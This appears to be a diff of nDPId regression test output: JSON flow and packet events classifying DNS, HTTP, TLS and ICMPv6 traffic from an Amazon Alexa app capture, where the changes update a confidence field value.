-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1490976031687,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976031687,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl0Y5AAEARu\/+sECoBrBAq2AA1oEYAUS8VStyBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAA8ACwhwaXRhbmd1acASwC4AAQABAAAADwAENF7ohg=="} -00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976031687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} +00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976031687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031691,"flow_last_seen":1490976031691,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976031691,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1490976031691,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976031691,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fGdAAEAGyoesECrYNF7ohsGkAFBD6jbWAAAAAKAC\/\/\/L1QAAAgQFtAQCCAoA9kqxAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1490976031773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031773,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMAtAAOcGb+80XuiGrBAq2ABQwaTMUP0xQ+o213ASH\/5qBQAAAgQFtAEDAwY="} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1490976031774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031774,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofGhAAEAGypqsECrYNF7ohsGkAFBD6jbXzFD9MlAQAVe0dgAA"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976031691,"flow_last_seen":1490976031776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":808,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1490976031776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976031691,"flow_last_seen":1490976031776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":808,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1490976031776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1490976032763,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1490976032763,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAf6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHvkAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"} 
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1490976032763,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1490976032763,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAf6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHvkAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035502,"flow_last_seen":1490976035502,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1490976035502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1490976035502,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1490976035502,"pkt":"AMDKkaPvePiC0\/vCCABFAABWWlJAAEARM0usECrYrBAqAVwHADUAQq4NgPsBAAABAAAAAAAAEGNvZ25pdG8taWRlbnRpdHkJdXMtZWFzdC0xCWFtYXpvbmF3cwNjb20AAAEAAQ=="} -00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035502,"flow_last_seen":1490976035502,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1490976035502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035502,"flow_last_seen":1490976035502,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1490976035502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1490976035549,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1490976035549,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC20jNAAEARuwmsECoBrBAq2AA1XAcAoid0gPuBgAABAAYAAAAAEGNvZ25pdG8taWRlbnRpdHkJdXMtZWFzdC0xCWFtYXpvbmF3cwNjb20AAAEAAcAMAAEAAQAAAAIABCLHNPDADAABAAEAAAACAAQ0AM87wAwAAQABAAAAAgAENBT4ysAMAAEAAQAAAAIABCLAPyvADAABAAEAAAACAAQ0ynf3wAwAAQABAAAAAgAENq23qQ=="} 
-00822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976035549,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"34.199.52.240"}} +00822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976035549,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"34.199.52.240"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035553,"flow_last_seen":1490976035553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976035553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1490976035553,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035553,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JIdAAEAG55WsECrYIsc08JXbAbv9XGi0AAAAAKAC\/\/\/OjgAAAgQFtAQCCAoA9kwzAAAAAAEDAwg="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1490976035610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035610,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7ldsM0X8G\/VxotaASaN9A1wAAAgQFtAQCCApEF1TYAPZMMwEDAwg="} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1490976035612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976035612,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0JIhAAEAG55ysECrYIsc08JXbAbv9XGi1DNF\/B4AQAVfXJgAAAQEICgD2TDlEF1TY"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976035553,"flow_last_seen":1490976035616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976035616,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01327{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3617,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} 
+00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976035553,"flow_last_seen":1490976035616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976035616,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01327{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3617,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976037754,"flow_last_seen":1490976037754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976037754,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1490976037754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037754,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8+KpAAEAGE3KsECrYIsc08JXcAbvRHbWkAAAAAKAC\/\/+tAQAAAgQFtAQCCAoA9k0OAAAAAAEDAwg="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1490976037803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037803,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOoGYhwixzTwrBAq2AG7ldw4CtRs0R21paASaN+cagAAAgQFtAQCCApEF1cYAPZNDgEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1490976037807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976037807,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0+KtAAEAGE3msECrYIsc08JXcAbvRHbWlOArUbYAQAVcyugAAAQEICgD2TRREF1cY"} 
